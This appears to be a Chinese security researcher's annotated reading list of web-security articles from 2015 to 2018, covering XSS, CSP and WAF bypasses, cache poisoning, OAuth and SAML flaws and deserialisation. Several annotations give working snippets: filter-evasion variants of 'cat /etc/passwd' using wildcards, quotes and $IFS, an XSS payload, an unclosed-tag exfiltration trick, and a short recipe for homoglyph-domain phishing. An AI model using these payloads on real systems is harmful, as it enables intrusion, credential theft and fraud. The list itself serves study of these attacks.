5
9月

Tittle: 好文章共赏

3 作者:admin

2018.11.15------------------------------------------------------------------------------------

Old School Pwning with New School Tricks :: Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability

【phar配合反序列化使用技巧】

2018.10.8------------------------------------------------------------------------------------

An interesting Google vulnerability that got me 3133.7 reward.

【X-HTTP-Method-Override这个http头可以重写请求方法,浏览器会先发送一个OPTIONS请求询问后端是否支持该头部,如果支持的话,就能通过这个头部改写请求方法。】

2018.9.29------------------------------------------------------------------------------------

深入理解跨站点 WebSocket 劫持漏洞的原理及防范

【WebSocket协议默认是不会校验Origin的,所以如果网站使用WebSocket来进行敏感数据的交互,那么攻击者可以像利用CSRF一样来自己的页面中嵌入WebSocket向网站发起请求,并且由于WebSocket协议是没有同源策略保护的,所以有别于CSRF,攻击者可以通过js获取到服务器返回的数据。 测试时对WebSocket请求进行抓包,修改Origin,查看是否返回101状态码,并且之后进行敏感操作重放。 】

2018.9.13------------------------------------------------------------------------------------

基于ACME http-01身份验证的实现方式的XSS

【Apache有一个名为Magic MIME的旧模式,它将根据响应的第一个字节来确定内容类型。如果启用了该模式,则可以根据响应包含的字符类型来控制内容类型。例如,<b>会导致内容类型为text/html,<?xml会导致内容类型为text/xml。在进行测试时,对于请求/.well-known/acme-challenge/<b>,响应实际上以text/html的形式返回的。 Internet Explorer版本<=Windows 8.1 将content-type设置为message/rfc822,它代表Microsoft Outlook Express邮件,用于将电子邮件内容保存到文件中. 】

子域名劫持指南

2018.8.20------------------------------------------------------------------------------------

GraphQL安全指北

Unicode安全

Tangled World of Web Technology ― Are we safe?

2018.8.13------------------------------------------------------------------------------------

Subdomain Takeover相关

2018.8.10------------------------------------------------------------------------------------

How Cloudflare protects customers from cache poisoning

Practical Web Cache Poisoning

【文章配合实例讲解了通过插入一些头部字符来检测返回中是否包含该字符X-Forward-Host,以及是否是缓存服务,如果是缓存服务的话,可能可以通过投毒来缓存一些恶意内容,里面还讲到zend的一个头部X-Original-URL会覆盖请求中的url,drupal的缓存刚好能用这个头来实现对特定url的投毒。】

2018.8.3------------------------------------------------------------------------------------

Exploiting a Microsoft Edge Vulnerability to Steal Files

Bypassing and exploiting Bucket Upload Policies and Signed URLs

ASP.NET resource files (.RESX) and deserialisation issues

【黑名单限制上传下 先上传文件名为App_LocalResources::$Index_allocation或App_LocalResources:$i30:$Index_allocation生成App_LocalResources文件夹,然后再上传.resx或.resources文件造成文件执行】

2018.7.16------------------------------------------------------------------------------------

PHP索引数组+unset使用不当导致的问题

【unset在对数组进行操作时,只有unset数组对应的数字索引才能将变量销毁,如果传入的是值则不处理 比如$a=Array('gif','jpg','jpeg','bmp','png','php'); unset($a['php']);是无效的 需要unset($a[5]);传入的是数组中的数字索引! 】

2018.7.11------------------------------------------------------------------------------------

How to trick CSP in letting you run whatever you want

【通过iframe来尝试绕过csp的拦截】

2018.6.28------------------------------------------------------------------------------------

Take Advantage of Out-of-Scope Domains in Bug Bounty Programs

【当www.b.com的document.domain设置为根域b.com时,aaa.b.com也将document.domain设置为b.com,然后aaa可以通过iframe嵌套www.b.com并读取任意内容】

2018.5.18------------------------------------------------------------------------------------

Google YOLO

Highly wormable clickjacking in twitter player card

X-Frame-Options: SAMEORIGIN largely useless as implemented

【X-Frame-Options: SAMEORIGIN的情况下,目前只有chrome和firefox修了这个问题 A.COM允许iframe, 则a.com去iframe hacker.com,然后在hacker.com里面再iframe a.com就能绕过X-Frame-Options: SAMEORIGIN的拦截 】

2018.5.14------------------------------------------------------------------------------------

绕过Linux受限Shell环境的技巧

2018.5.7------------------------------------------------------------------------------------

未授权访问的tips

【未授权访问的一些总结】

2018.5.2------------------------------------------------------------------------------------

告别效率低下的目录扫描方法

【 Windows + Nginx + PHP: (1)/abcdefgwoaini123/xxxaaabbbccc.php------>/abcdef~1/xxxaaa~1.php (2)/abcdefgwoaini123/xxxaaabbbccc.php------>/abcdef~1/x<.php Windows + IIS + PHP: (1)OPTIONS请求------>存在时返回404,不存在时返回200 (2)结合php的一些内容返回函数来判断文件的存在(比如getimagesize判断文件大小) /a</01.png 返回正常------>说明目录是a开头 /ab</01.png 返回正常------>说明目录是ab开头 Windows + Apache + PHP: (1)结合php的一些内容返回函数来判断文件的存在(比如getimagesize判断文件大小) /a</01.png 返回正常------>说明目录是a开头 /ab</01.png 返回正常------>说明目录是ab开头 (2)/abcdefgwoaini123/xxxaaabbbccc.php------>/abcdef~1/xxxaaa~1.php Windows + IIS 7.x + .net: OPTIONS请求------>存在时返回404,不存在时返回200 】

【IIS 5 中,IIS的配置文件在: C:\WINNT\system32\inetsrv\MetaBase.bin IIS 6 中,IIS 的配置文件在: C:\WINDOWS\system32\inetsrv\MetaBase.xml IIS 7 中,IIS 的配置文件在: C:\WINDOWS\system32\inetstr\config\applicationHost.config】 2018.4.4------------------------------------------------------------------------------------ ##动态内容缓存技术 CSI,SSI,ESI介绍 ##Beyond XSS: Edge Side Include Injection 【服务器如果没有对用户提交的<>进行编码并且支持esi的情况下,服务器会将<esi>标签返回给缓存服务器,缓存服务器之后会执行esi的指令,然后返回内容的用户,这可能导致ssrf或者读取httponly cookie等问题!】 2018.3.26------------------------------------------------------------------------------------ ##PHP trick(代码审计关注点) 【PHP代码审计中要注意的一些语言函数特性】 2018.3.18------------------------------------------------------------------------------------ ##反序列化之PHP原生类的利用 【在无法构造利用链的情况下,可以使用这些技巧进行反序列化操作】 2018.3.14------------------------------------------------------------------------------------ ##The Java Soothsayer: A practical application for insecure randomness. (Includes free 0day) ##randomstringutils:Cracker for Apache.lang.commons RandomStringUtils(). Code 【Apache.lang.commons RandomStringUtils生成的随即字符是有问题的,可以进行爆破】 2018.2.2------------------------------------------------------------------------------------ ##PHP源码调试之Windows文件通配符分析 【Windows上: 大于号(>)相等于通配符问号(?) 小于号(<)相当于通配符星号(*) 双引号(")相当于点字符(.) 】 2018.2.1------------------------------------------------------------------------------------ ##Markdown parsing issue enables insertion of malicious tags and event handlers 【Markdown编辑器的测试,具有借鉴意义】 2018.1.27------------------------------------------------------------------------------------ ##代码审计小trick 2018.1.24------------------------------------------------------------------------------------ ##Using Google Analytics for data extraction 【在一些部署了CSP,有很严格限制的场景,他们可能会放行Google Analytics,然后Google Analytics是每个人都能申请的,只是后面的id不同。如果网站限制了JavaScript的注入,但是没有限制html代码注入,如果注入<img src='你的Google Analytics地址,浏览器会将html中碰到的第一个'前面的数据全部当成请求参数,然后向你的Google Analytics发起请求,最后你就可以获取一些敏感数据。】 2018.1.18------------------------------------------------------------------------------------ ##PHP弱类型在实战中导致的漏洞总结 ##DEDECMS 任意重置管理员密码 ##dedecms阉割版本姿势 【在登录、注册,密码找回等流程中的类型比较尤为重要,需要重点关注是否有弱类型比较问题】 2018.1.17------------------------------------------------------------------------------------ ##Bypassing CSP by Abusing JSONP Endpoints 【在csp限制为只允许加载本地域资源时,如果能找到当前域的一个jsonp,并且callback名称可控制,那么就可以通过加载这个jsonp接口,callback名称设置为xss的payload来绕过csp策略执行xss。】 2018.1.15------------------------------------------------------------------------------------ ##Web Application Firewall (WAF) Evasion Techniques ##Web Application Firewall (WAF) Evasion Techniques 2 【绕过WAF的命令执行拦截,在linux中*和?是通配符,可以指代字符,于是要执行cat /etc/passwd等价于/???/c?? /???/p??s??(/bin/cat /etc/passwd) /bin/c'at' /e'tc'/pa'ss'wd /b'i'n/c'a't /e't'c/p'a's's'w'd' c\a\t /et\c/pas\swd(在url中请求要注意转义\) cat$u /etc$u/passwd$u 】 【空格被过滤的情况 IFS=,;`cat<<<cat,/etc/passwd` cat$IFS/etc/passwd cat${IFS}/etc/passwd cat</etc/passwd {cat,/etc/passwd} OR {ls,-las,/var} with args X=$'cat\x20/etc/passwd'&&$X 】 2018.1.11------------------------------------------------------------------------------------ ##分享几个绕过URL跳转限制的思路 【aaa.com?bb.com、aaa.com\bbb.com、aaa.com.bbb.com等】 2018.1.9------------------------------------------------------------------------------------ ##服务器端包含注入SSI分析总结 2018.1.2------------------------------------------------------------------------------------ ##利用CORS实现跨域请求 ##JSON CSRF with FLASH (.swf) File 【请求方法是GET、HEAD或者POST,并且当请求方法是POST时,Content-Type只能是application/x-www-form-urlencoded, multipart/form-data或着text/plain中的一个值,所以如果如果为json数据时,Content-Type为application/json,如果修改为上述中的一个并且将数据改为键值对提交不成功,那么只能通过flash+307进行跳转请求,这时Content-Type为application/json】 -----------------------------------------------------------------------2017----------------------------------------------------------------------- 2017.10.23------------------------------------------------------------------------------------ ##基于约束的SQL攻击 【数据库中的唯一性字段一定要设置UNIQUE约束,否则通过admin (很多空格)1直到达到数据库长度的方式来进行admin账户的注册。】 2017.10.11------------------------------------------------------------------------------------ ##PHP mt_rand()随机数安全 2017.9.22------------------------------------------------------------------------------------ ##How I hacked hundreds of companies through their helpdesk 【很有意思的一个漏洞发现。首先A.com有一个工单系统,逻辑是这样的:你在A.com用邮箱[email protected]注册了一个账号,如果你通过登录邮箱[email protected],然后向该工单系统的邮箱[email protected]发送邮件,这些邮件也会保存在工单系统中。然后你知道A.com在B.com有一个内部开发的团队交流圈,你想渗透进去。于是你在A.com注册B.com专门用来发送激活链接的邮箱[email protected],由于没有进行邮箱验证,你注册成功了。之后你再B.com注册时用的是[email protected],然后[email protected]向该邮箱发送激活链接。这时候[email protected]收到链接后,认为这是来自用户[email protected](因为发起邮件的是这个邮箱)发送的工单,于是该条邮件被记录在了自己的工单记录中。】 2017.9.20------------------------------------------------------------------------------------ ##A couple more common OAuth 2.0 vulnerabilities 【在获取到OAuth认证的code后,可以一直重复提交获取多个access_token,这样即使用户取消了授权,这些多余的access_token也还能使用;应用向已获取token的用户重复发起获取code的请求,之后即使用户取消了授权,应用还是可以拿这些获取到的code再次请求有效的access_token】 2017.8.31------------------------------------------------------------------------------------ ##Advanced Flash Vulnerabilities in Youtube – Part 1 ##Advanced Flash Vulnerabilities in Youtube – Part 2 ##Advanced Flash Vulnerabilities in Youtube – Part 3 2017.8.29------------------------------------------------------------------------------------ ##Exploiting JSON Cross Site Request Forgery (CSRF) using Flash ##中文翻译 ##Make API calls on behalf of another user (CSRF protection bypass) 【通过flash+php 307跳转来实现一些http请求头部的伪造,以绕过限制。比如通过向falsh船传递json数据然后请求访问php文件,php在307跳转的时候,可以传递http头部Content-type: application/json头部(这个头部在默认构造的csrf页面中是没办法伪造的)。】 2017.8.7------------------------------------------------------------------------------------ ##HTTP 中的隐藏攻击面 【通过log来获取记录各种请求,获取敏感信息并进一步利用】 2017.8.3------------------------------------------------------------------------------------ ##WEB请求处理二:Nginx请求反向代理 ##浅析 Web Cache 欺骗攻击 【后端做了静态缓存时,如果应用的逻辑为访问/user/index.php和访问/user/xxx.jpg都返回/user/index.php的内容。结合两者,当用户访问/user/xxx.jpg时,缓存服务器会去请求/user/index.php的内容,最后将其内容缓存到/user/xxx.jpg】 2017.7.27------------------------------------------------------------------------------------ ##SQLite手工注入Getshell技巧 2017.6.22------------------------------------------------------------------------------------ ##一次测试引发的探索:关于分号在java web中的一个特性 【在java web中我们使用分号和问号,在某种程度上来说,是可以起到截断的作用的】 2017.6.14------------------------------------------------------------------------------------ ##某P2P系统对象自动绑定漏洞可任意充值 【当响应中比请求中多出很多参数时,可以将响应中的参数拿来重新发起请求,看看会不会服务器也处理了这些参数】 2017.5.24------------------------------------------------------------------------------------ ##HACKERONE XSSI – STEALING MULTI LINE STRINGS 2017.5.19------------------------------------------------------------------------------------ ##Popup Blocker bypass on Microsoft Internet Explorer 2017.5.10------------------------------------------------------------------------------------ ##新型Web攻击技术——Web缓存欺骗 2017.4.26------------------------------------------------------------------------------------ ##USAGE OF XSS FILTER ##Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 【PHP-FPM对外开放的情况下】 2017.4.17------------------------------------------------------------------------------------ ##Phishing with Unicode Domains 【在这里生成域名字符的同型字母http://homoglyphs.net/?text=&lang=en&exc3=1&exc7=1&exc8=1&exc13=1&exc14=1 然后在这里http://www.msxindl.com/tools/punycode/转换成punycode 然后去注册域名 然后购买主机 然后开始钓鱼】 2017.4.7------------------------------------------------------------------------------------ ##CVE-2015-3269: Apache Flex BlazeDS XXE Vulnerabilty 【如果DocumentBuilder=DocumentBuilderFactory.newInstance().newDocumentBuilder()实例化的,则需要自行配置parser,否则这样默认是能读取外部实体的,会导致xxe】 2017.3.14------------------------------------------------------------------------------------ ##Github Enterprise SAML authentication bypass ##The road to hell is paved with SAML Assertions ##利用XML签名攻击绕过SAML2.0单点登录 ##微软 Office 365平台SAML服务漏洞,可越权访问其他用户资源 【1.SAML响应通过浏览器了吗? 2.响应内容是否被签名了?如果没有签名,尝试改变其内容。 3.如果删除签名数据,响应内容是否被接受? 4.如果我们使用其他证书重新进行签名,响应内容是否被接受? 5.使用SAML Raider自带的8种转换方式生成的结果是否被接受? 6.如果你更改此类响应,更改后的响应是否被接受? 7.是否遇到了上文所述的SAML Raider的局限性?如果是,你需要尝试手动测试方法。】 2017.3.8------------------------------------------------------------------------------------ ## 2017.2.17------------------------------------------------------------------------------------ ##Hacking Slack using postMessage and WebSocket-reconnect to steal your precious token ##支付安全不能说的那些事 【棒】 2017.2.10------------------------------------------------------------------------------------ ##Exploiting Node.js deserialization bug for Remote Code Execution 2017.2.8------------------------------------------------------------------------------------ ##Type Juggling and PHP Object Injection, and SQLi, Oh My! 【蛮不错的反序列化漏洞,不过有点疑问,这里的secret应该是程序自动生成的并且每个都不同...而且代码也没有开源,那他是怎么得到的.....】 1.17------------------------------------------------------------------------------------ ##Respect My Authority – Hijacking Broken Nameservers to Compromise Your Target 【通过dig域名+trace来查询指定域名的A记录以及解析服务器,进而来发现是否有A记录已经过期或者解析服务器已经过期而对过期的域名进行注册(A记录指向第三方的CDN),从而控制解析服务,为所欲为。】 ------------------------------------------谷歌2015安全名人堂文章系列------------------------------------------ ##XSS via window.stop() - Google Safen Up 【通过加载外域js来进行的防护,使用window.stop来阻止该js的加载,貌似360的护心镜可能也会有此问题。】 ##XSS via file upload - www.google.com (Postini Header Analyzer) ##Gmail and Google+ - tale of two XSS-es ##XSS via Host header - www.google.com/cse 【ie11导致的这个xss....】 ##Facebook and two dots leak 【 OSX和Linux下的Google Chrome浏览器会将域名中的多个点当成一个点;fb的某个站点在OAuth认证的时,redirect_uri的值鉴定的有问题,除了允许二级域名意外,只要域名中含多个点就能绕过拦截,如2.s..com,导致认证后被重定向到用户可控的站点,导致token丢失!】 ##Google Doodle - XSS (actually response splitting) ##CRLF injection on Twitter or why blacklists fail 【CRLF型注入,主要就是用户提交的数据直接被放置在了响应的头部中(比如Set-Cookie),且也没有对%0a%0d进行过滤,这时候就可以注入任意的数据到响应体中】 ##Yahoo Mail stored XSS 【先通过源代码模式插入所有的标签,然后再查看服务器的处理情况,再针对性的测试数据】 ##Flickr from SQL Injection to RCE ##ahoo Commerce Central SSRF ##How did i XSS all Yahoo Main domains!! ##BookFresh Tricky File Upload Bypass to RCE 【通过对比php-gd处理前后的图片的二进制内容,发现相同的部分可以替换成shell代码】 ##XSS in Hidden Input Fields ##XSS on a input hidden field ##A TALE OF TWO OFFLINE CHROME UXSS VULNS ##I KNOW WHO YOU ARE 【通过网站提供的功能的逻辑性来判断用户的状态】 ##Stealing OAuth tokens in Microsoft Web applications ##crossdomain.xml : Beware of Wildcards ---------------------------------------------------2016----------------------------------------------------------------- 12.17------------------------------------------------------------------------------------ ##Critical Issue Affects Privacy of 1-Billion Facebook Messenger Users; Potentially Affects Millions of Other Websites 【经典CORS配置错误教科书级文章,允许origin为null】 12.7------------------------------------------------------------------------------------ ##Firefox - SVG cross domain cookie vulnerability 【这个和self-xss一起用,简直棒棒棒】 10.26------------------------------------------------------------------------------------ ##Bypassing Content-Security-Policy with DNS prefetching 10.18------------------------------------------------------------------------------------ ##From PouchDB to RCE: a node.js injection vector ##Insecure Defaults - Exploiting LOAD DATA LOCAL INFILE 10.15------------------------------------------------------------------------------------ ##Exploiting CORS Misconfigurations for Bitcoins and Bounties 10.8------------------------------------------------------------------------------------ ##linux 提权 实战Linux下三种不同方式的提权技巧 10.5------------------------------------------------------------------------------------ ##How I hacked Pornhub for fun and profit - 10,000$ 【黑盒测试php反序列化,收藏起来,简直牛翻了】 9.28------------------------------------------------------------------------------------ ##Workers SOP Bypass importScripts and baseHref 9.22------------------------------------------------------------------------------------ ##记一下PythonWeb代码审计应该注意的地方 ##Safari's URL redirection XSS - CVE-2016-4585 9.10------------------------------------------------------------------------------------ ##Bypassing path restriction on whitelisted CDNs to circumvent CSP protections 【csp,火狐浏览器,绕过,2次URL编码,加载angular.js】 9.8------------------------------------------------------------------------------------ ##Grabbing data from Inputs and Textareas ##Internet Explorer has a URL problem 【这个又说到了http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html,现在还是懵逼状态】 8.26------------------------------------------------------------------------------------ ##Executing bash commands without space 【linux下空格替代字符】 【ls$IFS-l】 ##老洞新姿势,记一次漏洞挖掘和利用(PHPMailer RCE) 【{ls,-al} cat<>test CMD=$'\x20/etc/passwd'&&cat$CMD 】 7.6------------------------------------------------------------------------------------ ##Firefox - Same-Origin Policy bypass (CVE-2015-7188) 6.17------------------------------------------------------------------------------------ ##Email Injection 6.16------------------------------------------------------------------------------------ ##CodeIgniter框架内核设计缺陷可能导致任意代码执行 6.14------------------------------------------------------------------------------------ ##CRLF-Injection-and-Bypass-WAF 6.3------------------------------------------------------------------------------------ ##Finding XSS vulnerabilities in flash files. 5.26------------------------------------------------------------------------------------ ##phpwind 利用哈希长度扩展攻击进行getshell 【补充知识】 ##哈希扩展长度攻击讲解 5.19------------------------------------------------------------------------------------ ##Phpwind GET型CSRF任意代码执行 5.10------------------------------------------------------------------------------------ ##Bypassing XSS Auditor - Translate 【任何在<script>和</script>之间的字符串,如果由单引号或双引号包围,都被视为注释。<script>alert(1);"]="</script>】 5.4------------------------------------------------------------------------------------ ##跨过浏览器同源策略 5.3------------------------------------------------------------------------------------ ##黑帽SEO升级:克隆版网站窃取谷歌排名 4.26------------------------------------------------------------------------------------ ##贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询) 【参数名字中包含" "、"."、"["这几个字符,会将他们转换成下划线,user.id=22222-->user_id=22222】 4.25------------------------------------------------------------------------------------ ##Drag Drop XSS in Google ##原本丢掉的跨站漏洞 – JavaScript 特性利用 4.20------------------------------------------------------------------------------------ ##GitHub CSP应用的经验分享 4.19------------------------------------------------------------------------------------ ##Yahoo Login Protection Seal – Stored CSS Injection ##ESEA Server-Side Request Forgery and Querying AWS Meta Data ##Bypassing password authentication of users that have 2FA enabled 4.14------------------------------------------------------------------------------------ ##Best reports series - Account Recovery XSS 4.5------------------------------------------------------------------------------------ ##Flash XSS攻击总结 3.22------------------------------------------------------------------------------------ ##The misunderstood X-XSS-Protection 3.20------------------------------------------------------------------------------------ ##HTTP Response Splitting in Node.js – Root Cause Analysis 【node.js设置返回的数据格式为“ascii” 或 “binary”时,如果提交的数据为U+010D (č)或者Unicode字符集 U+010A (Ċ) 时,这两个字符会被处理成CR和LF,绕过拦截,造成CRLF注入。】 ##WebShell技术总结 ##PyYAML 对象类型解析导致的命令执行问题 3.18------------------------------------------------------------------------------------ ##Bypassing SOP and shouting hello before you cross the pond 3.3------------------------------------------------------------------------------------ ##Finding a XSS in Microsoft OAuth Interface, a major risk for the security of the users' account ##Widespread XSS Vulnerabilities in Ad Network Code Affecting Top Tier Publishers, Retailers 2.29------------------------------------------------------------------------------------ ##Stored, Reflected and DOM XSS in Google for Work Connect (GWC) 2.25------------------------------------------------------------------------------------ ##利用 Python 特性在 Jinja2 模板中执行任意代码 ##服务端模板注入攻击 (SSTI) 之浅析 2.24------------------------------------------------------------------------------------ ##视频 我们如何差一点拯救了互联网:CDNLoop攻击 【1、CDN自循环:将ip绑定成127.0.0.1的地址(某些方法绕过限制绑定本地回环地址),一直请求某个文件; 2、CDN内部多节点循环:将域名解析到a.com,cdn转发表中a.com指向b.com,cdn转发表中b.com指向c.com,cdn转发表中c.com指向a.com,造成循环查询。(a.com/b.com/c.com都为攻击者在CDN上可控的域名); 3、跨CDN循环:不同厂商的CDN节点可能会将来源的tag去掉,这时候让CDN_A点的域名a.com指向CDN_B的域名b.com,让CDN_B点的域名b.com指向CDN_A的域名a.com,造成查询循环. 以response streaming,收一点传一点的方式来进行数据的传输,能够导致不间断的流量请求回环。 gzip炸弹:攻击者返回gzip加密的数据,如果CDN节点接受并进行解压,造成1K倍的效果 大坝攻击:通过DNS降低转发效率,通过上面的循环储存大量的环形请求,到某一个时间点将储存的内环数据释放到外网,即域名对应的ip都指向特定的攻击目标。】 ##CDN流量放大攻击思路 2.18------------------------------------------------------------------------------------ ##Yahoo Remote Code Execution on cms.snacktv.de ##How I got a shell on Google Acquisition ? 【收购第三方业务后,安全标准不一导致的被渗透】 2.15------------------------------------------------------------------------------------ ##SQLi的那些事 2.5------------------------------------------------------------------------------------ ##Reverse Clickjacking 【算是SOME的前辈】 2.3------------------------------------------------------------------------------------ ##eBay Platform Exposed to Severe Vulnerability 1.29------------------------------------------------------------------------------------ ##An XSS on Facebook via PNGs & Wonky Content Types 【1、发现fb允许上传视频字幕文件到CDN上并且能够将访问的后缀改成.html后能以html格式返回数据,数据不对>进行过滤,但是对<进行过滤; 2、继续寻找能以html格式返回的文件类型,fb上上传的图片视频都会有带特殊的参数的链接,对这些带参数的链接进行后缀修改会触发错误,但是广告图片不带这些参数,于是可以从这里入手; 3、上传广告图片,将后缀修改成.html能够以html解析了,直接将代码插入到图片的话会触发图片错误,下一步就是要构造xss代码到图片中; 4、构造xss代码到图片中,图片没有报错并且<>没有被过滤,代码成功执行; 5、图片是在CDN域中并不fb域,通过查询发现fb的photo子域名解析到了该CDN域,将图片的地址放在photo的域名下能够访问到该图片,于是得到了一个fb域下的xss; 6、通过查找发现fb通过iframe标签引用了很多的插件,找到了一个其中的插件,该插件中有用户的token,因为photo和该插件都在fb域下,并且插件设置的domain为facebook.com,于是在photo的xss里将domain也设置成facebook.com,然后向该插件发起请求,获取token。】 ##XSS without HTML: Client-Side Template Injection with AngularJS ##DNS-based traffic correlation attacks 1.27------------------------------------------------------------------------------------ ##Rails Dynamic Render to RCE (CVE-2016-0752) 1.26------------------------------------------------------------------------------------ ##PayPal Remote Code Execution Vulnerability 1.21------------------------------------------------------------------------------------ ##DOM based XSS via Wistia embedding 【引用第三方js导致的xss问题】 1.20------------------------------------------------------------------------------------ ##Webshells - Every Time the Same Purpose, Every Time a Different Story… (Part 1) ##Webshells - Every Time the Same Story…(Part 2) 1.19------------------------------------------------------------------------------------ ##Yahoo Mail stored XSS could compromise email accounts ($10k) 1.18------------------------------------------------------------------------------------ ##HTTP Evasions Explained - Part 10 - Lazy Browsers 1.15------------------------------------------------------------------------------------ ##中国铁建内网漫游沦陷多个重要部门泄漏大量信息(redis+ssh-keygen免认证登录案例) 1.14------------------------------------------------------------------------------------ ##从一个“无标题”邮件到QQ邮箱服务器文件下载(运行日志、附件等) 1.11------------------------------------------------------------------------------------ ##关于Blind XXE ##A Comprehensive Formal Security Analysis of OAuth 2.0 【1、服务器通过307状态码返回code给客户,客户再通过307将code返回登录点,这时候因为307状态码的特性,也会将“用户提交给服务器的信息”返回给登录点! 2、用户向第三方网站请求登录黑客可控的idp时,第三方网站向idp提交client_id, redirect_uri, state,黑客可控的idp将该请求替换成向特定idp的请求返回给客户,客户这时向该特定的idp发起请求,获取到code后,由第三方网站向黑客控制的idp发起获取access_token的请求,这时候黑客控制的idp就获取到用户的code,可以以此向特定idp发起获取用户权限的请求了。 】 1.8------------------------------------------------------------------------------------ ##PHP DOS漏洞的新利用:CVE-2015-4024 Reviewed 1.7------------------------------------------------------------------------------------ ##On The Design and Implementation of a Stealth Backdoor for Web Applications 1.5------------------------------------------------------------------------------------ ##从ThinkPHP谈基于框架开发程序的安全性(从SQL注入到代码执行) ##从ThinkPHP谈基于框架开发程序的安全性二(有开源程序实例) ##XSS-A Close Call 【可控点在script标签内时,'、"、<、>都被过滤了,\没有被过滤。 <script>var a="可控点1";var b="可控点2";<script> 通过输入\,注意可控点1中的",导致可控点1的值为#可控点1\";var b="#,使得可控点2脱离双引号保护,可随意构造字符】 2015年------------------------------------------------------------------------------------------------------------------------------- 12.27------------------------------------------------------------------------------------ ##高级PHP应用程序漏洞审核技术 12.26------------------------------------------------------------------------------------ ##mysql的utf8字符集 【mysql中的utf8字符集不支持U+010000 --- U+10FFFF,会截断字符所在位置后面的数据,utf8mb4不会有这个问题】 ##WordPress < 3.6.1 PHP 对象注入漏洞 ##理解php对象注入 【注意注意注意!!!!!!!!GPC会转义!!!!!!! 反序列化的时候,如果参数可控,可以通过配合魔术方法来传入序列化的对象,然后达到调用对象的方法的目的 1、反序列化函数的参数可控;2、能找到一些包含我们想吊用的函数的类;3、该类被导进反序列化函数调用所在的文件】 ##Facebook's Moves - OAuth XSS 12.25------------------------------------------------------------------------------------ ##关于编码解码 【浏览器解码:html>url>js,编码时要根据环境来判断】 ##Joomla 3.4.7 修复的反序列化与SQL注入 ##Joomla反序列化漏洞的查漏补缺 ##A Hardcore XSS 12.22------------------------------------------------------------------------------------ ##从反序列化漏洞到掌控帝国:百万美刀的Instagram漏洞 12.18------------------------------------------------------------------------------------ ##In-depth analyses of the Joomla! 0-day User-Agent exploit 【文章不错,连同session的基础都涵盖了】 ##Top 10 OAuth 2 Implementation Vulnerabilities ##PHP5 session 详解【经典】 ##DESTOON V6.0 (2015-09-16) 前台无需登入sql 注入一枚 12.15------------------------------------------------------------------------------------ ##Joomla远程代码执行漏洞分析 ##115浏览器设计缺陷可导致远程窃取用户系统上的任意文件 ##傲游浏览器命令执行漏洞(特权域xss) 12.14------------------------------------------------------------------------------------ ##web应用安全防御100技 好书再次阅读, 变的只是表象,被概念迷惑的时候还是静下心来回顾本质 12.11------------------------------------------------------------------------------------ ##Java反序列化漏洞之Weblogic、Jboss利用教程 ##Java反序列化漏洞被忽略的大规模杀伤利用 【真是被低估了,奈何不懂java】 12.10------------------------------------------------------------------------------------ ##SMTP Injection via recipient email addresses 【库存在这个问题,但是有人在server端不做邮箱账号验证的吗.....】 12.9------------------------------------------------------------------------------------ ##Bad life advice - Replay attacks against HTTPS 12.8------------------------------------------------------------------------------------ ##Injecting Flask 【模板注入招致rce、xss;对模板中的变量进行{{}}包裹,对用户的输入进行|e操作,对返回的html数据的属性进行'、"包裹】 ##A Quick Glance at Modern Browsers's Protection Part #1 12.7------------------------------------------------------------------------------------ ##一处缺陷引发xss,导致qq、企业邮、126、163、yeah、189等邮箱接连躺着中枪 12.6------------------------------------------------------------------------------------ ##http2 ##网易用户登陆状态下点我的链接我就可进入其邮箱、云笔记等服务(不支持某些版本IE) 12.4------------------------------------------------------------------------------------ ##正方教务管理系统最新版无条件注入&GetShell 11.30------------------------------------------------------------------------------------ ##旧版本QQ中的一处打开聊天界面就能触发的远程命令执行 11.27------------------------------------------------------------------------------------ ##Remotely Sniffing Browser History via XSS Using HSTS + CSP 11.25------------------------------------------------------------------------------------ ##good-1 a writeup of Twitter's CSRF token exfiltration ##good-2 Postcards from the post-XSS world 【通过插入类似<img src="//1.com/ 的未闭合标签,将会将遇到的下一个"中间的内容全部当成链接的一部分,然后带上这些数据去请求该网站,导致一些数据泄露。还有很多其他的技巧】 ##good-3 Content Security Policy - The Reality ##PHP绕过open_basedir列目录的研究 ##从异常挖掘到CC攻击地下黑客团伙 ##Protecting Windows Networks – Dealing with credential theft 【介绍了很多后渗透后获取服务器/域用户名密码的方法,以及如何来保护服务器防止这些攻击】 11.24------------------------------------------------------------------------------ ##360护心镜脚本分析及N种绕过方式 【恩,通过重写方法】 ##cmseasy 无限制报错注入(php函数的坑) 【parse_str 本身会对数据进行一次decode!】 ##74cms 20150817 设计缺陷导致8处不同文件注入(gpc=off) 【修了写了半天的防注入配置文件,最后却没包含进去....】 11.23------------------------------------------------------------------------ ##webshell检测-日志分析 【好文*****】 11.21------------------------------------------------------------------- ##Webshell安全检测篇(1)-基于流量的检测方式 ##Webshell安全检测篇(2)-深入用户的内心 ##Webshell安全检测篇(3)-基于行为分析来发现“未知的Webshell” ##Apache日志解读,Apache日志每列代表什么? ##HTTP Evasions Explained - Part 7 - Lucky Numbers ##HTTP Evasions Explained - Part 8 - Borderline Robustness 【通过非200状态码来返回恶意内容(比如利用302跳转来返回)将有可能绕过防火墙的内容拦截,因为他不一定设置了对非200状态码的内容审核!】 【续head、浏览器、firewall不得不说的二三事....】 ##MegalodonHTTP Botnet Discovered The shark paradox ##50 SHADES OF WAF ##【三个白帽子】白盒审计writeup 【受益匪浅,遇到一些php的函数,直接去看他的C实现,来找出一些可以利用的点,可以通过一开始插入\x27,在stripcslashes函数处理时,就还原为'带入二次查询了;通过条件竞争来实现数据库清空,最后导致查询出数据再进行变量赋值的变量可以被我们人为初始化,从而进行注入!赞赞赞赞】 ##设置Linux端口转发,并实现"双向通路" 11.20----------------------------------------------------------------------- ##我的通行你的证.pptx 11.19------------------------------------------------------------------ ##From XSS to RCE 2.0 【黑科技 部分(wp、vBulletin) 需要配合msf】 ##COINBASE CLICKJACKING BUG WORTH 2000$ 【其实很好的是在自己的网站弄一个这样的,底层放吸引人的文章,中层放一个带关闭按钮的广告弹窗,顶层放透明化的poc在这个关闭按钮上,哈哈哈哈..... 关闭广告,比什么点击中奖更吸引人.....】 ##Taking screenshots using XSS and the HTML5 Canvas 11.18------------------------------------------------------------- ##The Unexpected Dangers of Dynamic JavaScript 11.17--------------------------------------------------------- ##Your Scripts in My Page:What Could Possibly GoWrong? 